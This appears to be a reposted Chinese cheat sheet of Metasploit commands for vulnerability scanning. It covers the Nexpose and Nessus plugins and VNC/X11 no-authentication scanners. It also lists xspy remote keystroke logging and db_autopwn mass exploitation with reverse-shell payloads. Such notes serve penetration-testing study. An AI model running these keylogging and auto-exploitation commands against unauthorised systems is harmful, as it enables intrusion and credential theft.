metasploit漏洞掃描


1.常用普通功能

db_destory  //刪除數據庫
nc ip port  //獲取基本系統信息

2.nexpose

連接數據庫
load nexpose  //載入nexpose插件
msf > help
msf > nexpose_connect -h   //查看連接nexpose需要的參數
msf >nexpose_connect 用戶名:密碼 ip地址 ok——登錄到nexpose
msf >nexpose_scan	//開始掃描
msf > db_hosts -c adress   //安地址分類查看結果
msf >db_vulns  //查看詳細信息

3.nessus

msf >load nessus
msf >nessus_help
msf >nessus_policy_list	//查看掃描選項
msf >nessus_sacn_new 選項號 任務名字 IP地址
msf >nessus_scan_status   //掃描狀態
msf >nessus_report_list   //所有掃描結果報告
msf >nessus_report_get ID號		//下載某個報告

4.其他

vnc無密碼掃描
msf > use auxiliary/scanner/vnc/vnc_none_auth

x11無密碼掃描
msf > use auxiliary/x11/open_x11

xspy遠程鍵盤記錄
./xspy -display ip地址

導入漏洞掃描工具生成文件實現自動化攻擊
db_autopwn -e -t -r -x -p
e(所有目標發起攻擊)
t(顯示所有匹配的模塊)
r(反彈shell的攻擊載荷)
x(根據漏洞選擇攻擊模塊)
p(根據開放的端口選擇攻擊模塊)
攻擊成功返回一個shell


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM